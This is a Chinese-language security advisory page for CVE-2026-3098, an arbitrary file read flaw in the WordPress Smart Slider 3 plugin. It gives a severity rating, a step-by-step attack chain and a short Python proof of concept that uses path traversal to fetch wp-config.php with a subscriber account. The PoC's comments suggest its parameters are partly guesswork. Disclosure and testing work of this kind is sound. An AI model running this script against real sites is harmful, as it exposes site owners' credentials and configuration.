IPBUF安全漏洞报告
English
CVE-2026-3098 CVSS 6.5 中危

CVE-2026-3098 WordPress Smart Slider 3 任意文件读取漏洞

披露日期: 2026-03-27

漏洞信息

漏洞编号
CVE-2026-3098
漏洞类型
任意文件读取
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Smart Slider 3 (WordPress Plugin)

相关标签

任意文件读取WordPressSmart Slider 3CVE-2026-3098权限绕过

漏洞概述

WordPress Smart Slider 3插件在3.5.1.33及之前版本中存在任意文件读取漏洞。该漏洞源于`actionExportAll`函数缺乏足够的权限检查和路径验证。具有订阅者及以上权限的认证攻击者可利用此漏洞读取服务器上的敏感文件,如配置文件、源代码等,导致信息泄露风险。

技术细节

该漏洞位于Smart Slider 3插件的`ControllerSliders.php`文件中的`actionExportAll`方法。由于插件在处理导出功能时,未对用户请求的文件路径进行严格的过滤和验证,导致攻击者可以通过目录遍历技术访问Web根目录之外的文件。攻击者只需拥有WordPress的订阅者权限(最低权限),即可发送特制的HTTP请求触发该漏洞。利用过程中,攻击者构造包含恶意路径参数的请求发送给服务器,服务器直接将指定文件内容返回给攻击者。CVSS向量显示攻击复杂度低,无需用户交互,主要影响机密性。虽然不需要管理员权限,但需要有效的账户凭证,这增加了利用的门槛,但在存在弱口令或注册开放的站点上风险依然较高。

攻击链分析

STEP 1
信息收集
识别目标WordPress站点是否安装了Smart Slider 3插件,并确认其版本号小于等于3.5.1.33。
STEP 2
获取权限
注册或获取一个WordPress订阅者级别的账户凭证。
STEP 3
发送恶意请求
使用订阅者账户登录,向`admin-ajax.php`发送包含恶意路径参数的POST请求,调用`actionExportAll`功能。
STEP 4
数据读取
服务器响应并返回指定路径(如wp-config.php)的文件内容,攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url, cookie): # Target endpoint usually is admin-ajax.php url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data targeting the vulnerable actionExportAll function data = { "action": "nextend_smart_slider3_action", "sub_action": "exportAll", "path": "../../../../../wp-config.php" # Path traversal attempt } headers = { "Cookie": cookie } try: response = requests.post(url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response content for file data.") print(response.text[:200]) # Print preview else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Usage # exploit("http://target-site.com", "wordpress_logged_in_xxx=...")

影响范围

Smart Slider 3 <= 3.5.1.33

防御指南

临时缓解措施
如果无法立即更新插件,建议暂时禁用Smart Slider 3插件以阻断攻击路径。同时,检查服务器日志是否存在针对该接口的异常访问记录,并排查敏感文件是否已被读取。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表